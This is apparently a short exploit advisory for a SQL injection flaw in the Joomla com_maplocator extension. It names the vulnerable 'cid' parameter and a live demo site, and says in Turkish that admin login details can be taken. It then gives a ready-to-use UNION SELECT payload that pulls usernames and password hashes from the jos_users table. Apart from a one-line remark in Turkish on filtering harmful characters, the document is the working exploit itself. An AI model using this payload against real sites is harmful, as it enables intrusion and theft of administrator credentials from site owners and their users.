<------------------- header data start ------------------- > ############################################################# Joomla Component maplocator SQL Injection Vulnerability ############################################################# # Author : Fl0riX ~ Bug Researchers # Greetz : DreamPower - CWKOMANDO - Toprak - Equ - Err0r - 10line - SOLVER - All My Friends :) # Name : Joomla com_maplocator # info : http://extensions.joomla.org/extensions/maps-a-weather/geotagging/16996 # Bug Type : SQL injection # Infection : Admin Login Bilgileri Alinabilir. # Demo site : [+]http://www.opensourcetechnologies.com/demos/maplocator [+] Example: site.com/index.php?option=com_maplocator&view=state&cid=[EXPLOIT] # Bug Fix Advice : Zararli Karakterler Filtrenmelidir. ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > EXPLOIT : null+AND+1=0+union+select+1,2,concat(username,0x3a,password)fl0rix,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users-- < -- bug code end of -- >